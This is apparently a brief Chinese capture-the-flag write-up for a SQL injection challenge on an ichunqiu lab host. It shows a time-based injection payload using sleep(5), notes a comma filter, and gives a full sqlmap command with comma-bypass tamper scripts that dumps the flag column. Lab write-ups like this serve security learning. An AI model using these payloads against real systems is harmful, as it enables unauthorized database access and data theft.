题目:SQLi
小坑
抓包发现302跳转,实际页面是l0gin.php?id=1
开始注入
-
?id=1' or sleep(5) -- -
发现存在注入,没有过滤单引号 -
之后尝试,发现过滤了
,
,并且,
后面的所有输入的字符都会被删除。
绕过逗号过滤
tamper
commalessmid
commalesslimit
ifnull2casewhenisnull
sqlmap 得出flag
sqlmap -u "http://eci-2zeclhdvg07b0cztl6y4.cloudeci1.ichunqiu.com/l0gin.php?id=1" -p "id" --level=5 -v 3 --tamper=commalessmid,commalesslimit,ifnull2casewhenisnull -D sqli -T users -C flag_9c861b688330 --dump